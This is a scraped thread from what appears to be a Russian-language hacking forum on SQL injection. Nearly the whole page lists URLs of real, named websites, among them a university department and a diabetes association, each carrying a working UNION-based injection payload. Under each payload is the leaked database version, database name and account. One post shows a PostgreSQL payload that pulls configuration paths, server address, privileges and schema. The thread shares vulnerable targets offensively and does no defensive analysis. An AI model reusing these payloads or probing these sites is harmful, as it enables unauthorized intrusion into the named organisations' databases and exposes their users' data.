SQL Инъекции

Discussion in 'Уязвимости' started by yarbabin, 27 Apr 2015.

  1. erbolg

    erbolg Member

    Joined:
    5 Nov 2021
    Messages:
    7
    Likes Received:
    13
    Reputations:
    3
    Code:
    http://www.bookgroup.info/041205/review.php?id=-53+union+select+1,2,3,concat_ws(0x23,version(),database(),user()),5--+-
    5.0.95
    haynes
    [email protected]

    Code:
    http://www.techsoeng.com/curriculum.php?id=-29%27+union+select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7,8,9,10--+-&id_foto=54
    5.5.62-38.14-LOG
    SQL845107_1
    [email protected]

    Code:
    http://www.horpak4u.com/view_detail.php?id=-3245%27+union+select+1,concat_ws(0x23,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-
    5.7.37
    horpak4u_data2
    horpak4u_nueng@localhost
     
    #261 erbolg, 14 Jan 2022
    Last edited: 22 Jan 2022
    crlf and Baskin-Robbins like this.
  2. Duble

    Duble Member

    Joined:
    28 Oct 2015
    Messages:
    60
    Likes Received:
    6
    Reputations:
    0
  3. erbolg

    erbolg Member

    Joined:
    5 Nov 2021
    Messages:
    7
    Likes Received:
    13
    Reputations:
    3
    Code:
    http://www.assassinatedrecords.com/prod_info.php?id=-69%27+/*!12345union*/+select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7,8,9,10,11,12,13—+-
    5.5.60-0+Deb7U1-Log
    Db272916802
    [email protected]

    Code:
    https://dbsoft.org/newsitem.php?id=-15+union+select+1,2,3,4,5,concat_ws(0x23,version(),database(),user()),7--+-
    5.7.34-log
    nuke
    nuke@localhost

    Code:
    http://oneplanetschool.com/pages/newsDetail.php?id=-12+union+select+1,concat_ws(0x23,version(),database(),user()),3,4,5,6--+-
    5.7.31-percona-sure1-log
    oneplanet_mydb
    oneplanetSol@localhost

    Code:
    https://www.ee.iitm.ac.in/news/newsdetail.php?id=-5%27+union+select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7,8,9--+-
    10.6.5-MariaDB-1:10.6.5+maria~focal
    eeMVCweb
    eewebmvc@localhost

    Code:
    https://www.himachalirishta.com/viewphoto.php?id=HPR364711%27+union+select+1,concat_ws(0x23,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91--+-&Choice=1
    10.1.44-MariaDB
    himmat_hrlive
    himmat@localhost

    Code:
    http://piriya-international.com/product.php?id=1/*!12345UNION*/select+1,2,3,4,concat_ws(0x23,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+-
    10.2.38-MARIADB
    NOPPADON_PIRIYA
    NOPPADON_IDESIGN@LOCALHOST

    Code:
    http://www.terasz.hu/galeria/main.php?inc=sorozat_reszlet&sorozat_id=-1120+union+select+1,concat_ws(0x23,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+-
    5.7.30
    kulturfoto
    [email protected]

    Code:
    https://www.lpmwatak.com/category.php?id=-4%27+/*!12345union*/+select+1,concat_ws(0x23,version(),database(),user())%2d%2d+-
    
    10.2.41-MariaDB-cll-lve
    lpmd9334_db
    lpmd9334_doni@localhost

    Code:
    https://ird.sut.ac.th/ird2020/readnews.php?id=-165%27+union+select+1,concat_ws(0x23,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%2d%2d+-
    5.5.68-MariaDB
    ird2020
    ird2020@localhost

    Code:
    http://www.myekooo.com/productlist.php?id=-597+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x23,version(),database(),user()),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--+-&tid=13
    5.5.19
    mysql3439283_db
    mysql3439283@gpRYIr1386

    Code:
    http://www.samspedy.com/shop/product.php?id=63+union+select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14--+-
    5.6.51-cll-lve
    samspedy_shop
    cherry@localhost

    Code:
    https://www.yuyama.com.hk/en/productlist.php?cat=-60+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat_ws(0x23,version(),database(),user()),28,29,30,31,32,33,34,35,36,37,38,39,40--+-
    5.5.65-MariaDB
    yuyama
    yuyama@localhost
     
    #263 erbolg, 27 Jan 2022
    Last edited: 2 Mar 2022
    crlf and Baskin-Robbins like this.
  4. erbolg

    erbolg Member

    Joined:
    5 Nov 2021
    Messages:
    7
    Likes Received:
    13
    Reputations:
    3
    Code:
    https://www.lateuaterra.com/news_item.php?id=-68+union+select+1,concat_ws(0x23,version(),database(),user()),3,4,5,6,7,8,9,10--+-&lang=100
    5.5.55
    terra2
    user_terra2@localhost

    Code:
    https://www.buddhisma2z.com/content.php?id=-179/*!12345union*/select+1,2,3,4,concat_ws(0x23,version(),database(),user()),6,7,8,9--+-
    5.6.41-84.1
    pitijoy_a2z
    pitijoy_root@localhost

    Code:
    http://www.addzollubricants.com/product_details.php?product_id=-5/*!12345union*/select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14—+-
    5.7.23-23
    wwwc2csi_addzol
    wwwc2csi_addzol@localhost

    Code:
    https://www.pyramidmachine.in/product_details.php?pr_id=73+union+select+1,concat_ws(0x23,version(),database(),user()),3,4,5,6,7--+-&main_cat_id=pQ==
    5.7.36
    pyramidm_pyarmid
    pyramidm_admin@localhost

    Code:
    http://diabetesphilippines.org/HOME/viewevent.php?eventid=-615+union+all+select+concat_ws(0x23,version(),database(),user()),2,3--+-
    5.7.37-CLL-LVE
    SOFTITPR_DB_DIABETESPHIL
    SOFTITPR_DP@LOCALHOST

    Code:
    https://www.atcproductions.tv/hire/viewitem.php?itemid=-9+union+all+select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7,8,9--+-
    5.6.51
    atcprodu_hire
    atcprodu_hire@localhost

    Code:
    http://imperium.su/pages.php?id=-5%27+union+select+1,2,3,4,concat_ws(0x23,version(),database(),user()),6,7—+-
    5.7.18-16
    imperium_db1
    imperium_db_user@localhost

    Code:
    https://myglobalshopee.com/product_details.php?id=-55fb8e3c27001b%27+union+select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+-
    10.1.44-MARIADB
    MYGSHOPE_MYGLOBS
    MYGSHOPE_MYGLOBS@LOCALHOST

    Code:
    http://gba-corona.com/news.php?id=-6/*!12345union*/select+1,2,3,concat_ws(0x23,version(),database(),user())--+-
    5.6.41-84.1
    ibizhq_gba
    ibizhq_gba@localhost
     
    #264 erbolg, 6 Mar 2022
    Last edited: 3 Apr 2022
    Baskin-Robbins and crlf like this.
  5. Huga12

    Huga12 New Member

    Joined:
    11 Apr 2022
    Messages:
    1
    Likes Received:
    2
    Reputations:
    0
    http://www.marciadalmondo.com/ita/dettagli_news.aspx?id=-4326 AND 1=0 UNION SELECT '1',$$ injected by imns $$CHR(60)CHR(60)$$VERSION >>> $$version()CHR(60)CHR(60)$$DATABASE >>> $$current_database()CHR(60)CHR(60)$$DB FILES >>> $$CHR(60)CHR(60)$$ - HBA >>> $$current_setting($$hba_file$$)CHR(60)CHR(60)$$ - DIRECTORY >>> $$current_setting($$data_directory$$)CHR(60)CHR(60)$$HOSTNAME AND IP ADDRESS >>> $$CHR(60)CHR(60)$$ - PORT >>> $$inet_server_port()CHR(60)CHR(60)$$ - ADDR >>> $$inet_server_addr()CHR(60)CHR(60)$$USER >>> $$userCHR(60)CHR(60)$$PRIVILEGES >>> $$(SELECT usename$$ >> $$usecreatedb$$ >> $$usesuper FROM pg_user)CHR(60)CHR(60)CHR(60)CHR(60)(SELECT ARRAY_TO_STRING(array(SELECT(CHR(60)CHR(60)table_nameCHR(32)CHR(62)CHR(62)CHR(62)CHR(32)column_name)::TEXT FROM information_schema.columns WHERE table_schema=$$public$$),CHR(60)CHR(60))),'3',null,null--+-
     
    Baskin-Robbins and crlf like this.